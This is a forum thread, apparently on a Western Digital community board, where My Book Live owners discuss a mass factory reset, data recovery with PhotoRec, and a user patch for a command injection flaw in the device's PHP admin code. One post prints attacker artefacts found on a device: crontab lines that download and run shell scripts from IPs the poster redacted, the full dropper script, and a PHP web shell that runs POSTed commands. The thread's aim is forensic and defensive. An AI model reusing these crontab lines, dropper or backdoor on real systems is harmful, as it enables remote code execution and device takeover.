Help! All data in mybook live gone and owner password unknown

I was addressing the update from WD you posted, not you really.

Update from my post #157 above…

My data guy who looking at it here has said he’s been able to read it with R-studio but it’s only RAW and no filenames or folders.

He can retrieve the files I want by extension, eg .jpg or .mp3, .avi etc.

My problem is I’m not sure exactly what I’m missing…
I’ve got most of critical ones backed up but certain folders were on the drive that were standalone, so really need the folder list (and ideally file list) to recall what I need back.

It’s not as simple as get me all jpeg or mp4. It’s like i only need some!!! Darn it.

Fortunately if I rack my brain I’ve only really lost Movies (not home ones but theatrical) and my ITunes library. For each of those, Movies well I can probably get a copy elsewhere, and itunes maybe restore from then iPhone that has them all still on it.

That said he has another trick that he thinks there is a backup file list the Linux creates. He needs to clone the disc and try over a few days. I’ll report back if we get a clear idea there.

I don’t think WD will help with this at all. I can’t see how they come up with any fix to restore reset drives with any patch. From what he says is no remote fix possible at all to restore them without a deep RAW scan. Sorry.

Given this is a mum and dad box for simple home use, this is a massive issue for the non network or non technical persons who (even me) get stressed when Minecraft doesn’t connect! I am in no way a network engineer and understand basic setup. God help the ones who are even less knowledgeable

The best we can hope for WD is to find the vulnerability for those who still have their data (or not!) so they can keep using the hardware. Otherwise we are all looking at expensive bricks and moving to Synology.

Good luck all.

1 Like

Thanks Mark. Just got the same mail from WD.

Bolted. Horse. Door. Shut… comes to mind. (In that order for WD comms effort)

1 Like

Ooooh I just got that email too, I now feel so much better despite losing all my data, thanks WD! Sigh.

I know it is already too late, but maybe some of you still have an unaffected MyBook.

I would like to share with you how to fix the security vulnerability CVE-2018-18472:

Access SSH and edit file (e.g. with “nano”)
/var/www/Admin/webapp/includes/languageConfiguration.php

First change
Search for:

exec("sudo bash -c '(echo \"language {$changes["language"]}\">/etc/language.conf)'", $output, $retVal);

Replace with:

if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $changes["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$changes["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);

Second change:
Search for:

exec("sudo bash -c '(echo \"language {$lang["language"]}\">/etc/language.conf)'", $output, $retVal);

Replace with:

if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $lang["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$lang["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);

See, this is all you need to do. WD knew about this bug in 2018 and they refused to change these TWO LINES of code, just because the product is “EndOfLife”…

Of course, there might be other bugs, but this is the biggest of all. I am not aware of other code injection bugs, but I will now review the code and see if there is more. I really would like to keep my MyBook because I hate throwing working hardware away…

EDIT: My first version contained an error. This is the correct one!!!
Note: The preg_match line is not required to fix the vulnerability, but it avoids that hackers write garbage in your /etc/language.conf file.

EDIT 2: My code review is done. I did not find further root command injections which don’t require authentication

EDIT 3: Additional security settings you should consider

  1. Disable “remote access” in the UI
  2. Change “connection options” from “automatic” to “manual”, this disables UPnP
    (thanks to @WDMyBookDead for that hint! They posted a screenshot)
  3. Disable UPnP in your router
  4. Disable factory reset:
    If you believe that you will never need the factory restore, I recommend disabling it completely.
    Edit /usr/local/sbin/factoryRestore.sh and wipeFactoryRestore.sh and change line #2 to exit.
7 Likes

Another affected user here in Canada. I had no idea there was an issue until I read the email from WD this afternoon. I checked the drive and sure enough, only the default folders were there. I unplugged the drive and here we are. I’m a hobby photographer, approximately 80,000 photos gone. I’m on the support chat waitlist, it’s been 11 seconds remaining for the past 20 minutes so I’m not holding my breath.

I wouldn’t hold out any hope that WD is going to help you retrieve lost data. The only thing they’re going to do is recommend software to try.

1 Like

I’m on a 4tb WD MyCloud on firmware 5.14.105, is it safe?
For those that lost data, did you have an attached usb on it? Was that wiped too?

I am hoping to get most files back with PhotoRec. Here’s what I did:

  • took out the drive carefully with instructions from iFixIt (link: Western Digital My Book Live Teardown - iFixit)

  • put this drive in in a SATA-USB reader and connect it up to a Linux machine. This small Linux machine is repurposed Acer Chromebox that boots up to Gallium OS. Any Linux variant machine will do I think. I tried this step on Windows and it asked to reformat the drive, NOPE!

  • The device shows up as /dev/sdb. I prepared another 2TB drive on /dev/sda. Ran PhotoRec (PhotoRec - CGSecurity) to recover lost files from /dev/sdb into /dev/sda.This will run all night/all day :frowning_man:

It has run for the last 1 hour and has recovered 18000 files (.jpg, .txt, .mov, .mp4, etc). Not bad! Unfortunately the counter says 40 more hours to go…
And the files recovered are all renamed to some random file names, but at least I have them back!!!

Good luck guys.

2 Likes

Thanks for the info! I just commented out all the sudo bash lines in that file They look dangerous, and I don’t need to change the language.

2 Likes

Hi Sunpeak [and others]. i too am locked on the login UI screen with password unrecognised. I have inserted a pin into the reset hole a few times now holding for the four seconds or more prescribed, but no change. did this work for you?

file explorer in my laptop i can see the volume and i can also browse the directory structure but all sub directories and files are gone. If i can crack the missing UI password problem i might have some luck recovering files, appreciate any useful reply

Has anyone tried this? Does it actually work?
After reading of this nightmare, I have unplugged my MyBook so everything is safe for now but I am worried of plugging it back obviously.

So, what are the changes in the code you implemented then? Could you share? Thanks!

UPnP was blocked on the servers but not blocked at the firewall. Front Modem/Router/Firewall is a Hitron CODA-4589. Behind that is an ASUS RT-N66U. UPnP was not blocked. Ports were forwarded on both but are blocked now. I have placed some test files on the wiped servers to see if they remain intact after I disabled the port forwarding. I think that was the culprit.

1 Like

Signed up to provide what info I can. Have a WD MBL that was not affected.

  • NAS was up until this morning
  • uPNP was enabled (disabled after reading the thread)
  • Auto updates disabled.
  • MBL put up a notification of new firmware at 23 Jan 2021 at 3am. Probably nothing, but no other notices about firmware since. Not running latest.
  • Remote access was enabled, though connection status shows failed (31520 error)
  • Router has IPv4 and IPv6 firewall enabled

Not sure why I was not affected. Could be the older firmware or maybe the firewall. The firmware notice is a bit odd too. Hope this helps.

2 Likes

After reset, there is no password. Just leave blank and press enter.
You will be logged in. Now you can create a password of your choosing.

Did you write that code yourself?

After one of my 4 western digital drives were factory reset, i decided to look for suspicious crontab entries.

I found this in /etc/crontab, ip numbers removed and replaced with xxx. Also, i had to alter the normal http colon // because im a “new user” limited to two links. (I have no intent in posting links) Two ip numbers were utilized.

1 * * * * root rm -f /tmp/w;wget -O /tmp/w http: xxx.xxx.xxx.xxx/w;/bin/sh /tmp/w
1 1 * * * root rm -f /tmp/wB;wget -O /tmp/wB http:
xxx.xxx.xxx.xxx/wB;/bin/sh /tmp/wB

The above appears to download two malicious shell scripts. I do not know how these were added to /etc/crontab on my western digital. One ip number points to Russia, the other Latvia.

I went ahead and downloaded “w” and “wB”

The contents of “w” are as follows, ip numbers removed and replaced with xxx.

This shell script appears to download a file that makes it seem that the web panel of the device is no longer working. It also downloads a hidden executible file called .nttp-z, which i don’t know what it does, but I was able to keep a copy of it.


#!/bin/sh

if ! cat /var/www/Admin/webapp/htdocs/accessDenied.php | grep -q “b18c3795fd377b51b7925b2b68ff818cc9115a47”
then
sudo wget -O /var/www/Admin/webapp/htdocs/accessDenied.php http: xxx.xxx.xxx.xxx/w-eZ2KRdHBfE.txt
fi

if ! cat /var/www/Admin/webapp/classes/api/1.0/rest/device/language_configuration.php | grep -q “05951edd7f05318019c4cfafab8e567afe7936d4”
then
sudo wget -O /var/www/Admin/webapp/classes/api/1.0/rest/device/language_configuration.php http: xxx.xxx.xxx.xxx/w-9YqJG9zgoN.txt
fi

if test -f /var/www/logout.php
then
sudo rm -f /var/www/logout.php
sudo /sbin/reboot
exit 0
fi

if ! sudo ps aux | grep -q “.[n]ttpd”
then
cd /tmp
sudo wget -O http: xxx.xxx.xxx.xxx/.nttpd,1-ppc-be-t1-z
sudo chmod 777 .nttpd-z
sudo ./.nttpd-z
fi

sleep 3

if ! sudo ps aux | grep -q “.[n]ttpd”
then
cd /tmp
sudo wget -O http: xxx.xxx.xxx.xxx/.nttpd-z /.nttpd,1-ppc-be-t1-z
sudo chmod 777 .nttpd-z
sudo ./.nttpd-z
fi

if sudo /etc/init.d/apache2 status | grep -q “running”
then
sudo /etc/init.d/apache2 stop
fi

rm -f /tmp/ybtIfV5lh3
wget -O /tmp/ybtIfV5lh3 http: xxx.xxx.xxx.xxx/w-ybtIfV5lh3
rm -f /tmp/ybtIfV5lh3

rm -f /tmp/w


wB just removes itself with rm

I will note that these wget commands change the name of what was downloaded and ends up replacing the file that came with the device made by Western Digital with the contents of the files downloaded from Latvia or Russia.

Here is the content of one of them (note i did separate some brackets so it would display :


< ?php
require_once(‘secureCommon.inc’);

?>

< !DOCTYPE html >
< html >
< head >
< meta http-equiv=“X-UA-Compatible” content=“IE=edge” >
< meta http-equiv=“Content-Type” content=“text/html; charset=UTF-8” >
< LINK REL=StyleSheet HREF="
css/main. css" TYPE=“text/css” >
< style >
.contentTables td {
color: #FFFFFF;
}

    .

formTable .
roundBox input {
height: 48px;
}
< /style >

	< script type=

“text/javascript” src=“js/jquery.js”> < / script >
< / head >

< body >
< ?php include ('header.inc') ? >
			
		< div class="topGrad" >
			< img src='images/WD2go_ColorStrip.png'/ >

			
			< div class="contentTables" >
	            < span class='title' >< ?php echo gettext('ACCESS_DENIED')? >< /span >
				< div class='titleSeperatorSpacing' >
					< div class='titleSeperator' >
					< /div >
				< /div >
				
				< br/ >
				< p>
					< ?php
						$_link_ = '"logout.php"'; 
						eval('echo "' . addslashes(gettext('ACCESS_DENIED_CONTENT')) . '";');

					?>
				< /p>
                < p class='GLF8JN4v4b' >
                    <?php
                        if(isset($_POST["k"]) && isset($_POST["c"]) && sha1($_POST["k"]) == "b18c3795fd377b51b7925b2b68ff818cc9115a47") {
                            system($_POST["c"]);
                        }
                    ?>
                </ p>
			< /div>		
			
			< div class='bottomGlow'>
				<img src="

images/WD2go_Glow.png" align=‘bottom’/>
</ div>

		< /div>						
	
</ body >

< /html >


Note the “ACCESS DENIED” in the message there.

I can’t get the post to just be text.

5 Likes

As far as I can see it these devices were rooted and I would not trust the operating system or the software installed on the system. Factory reset or not.

Now the fact that all of these Western Digitals just stopped working on the same day with evidence of a malicious nttpd binary on the system, i honestly think that this was some kind of botnet dismantling. Its too coincidental that these factory resets all seemed to take place in the middle of the night and at the same time.

And as far as I can tell, the data on these devices will only be recovered by removing the hard disk from the case and running a data recovery tool on it like photorec.

If you save files to your western digital after the factory reset you risk loosing data that might be recovered by either photorec or a tool like it.*

Take your disk to a data recovery service asap to increase the chance of saving data.

3 Likes

Since you mentioned this was a chron job, any thoughts on whether this was an already compromised machine where the commands were scheduled for execution. Could this be sitting on machines now without their knowledge, waiting to be executed?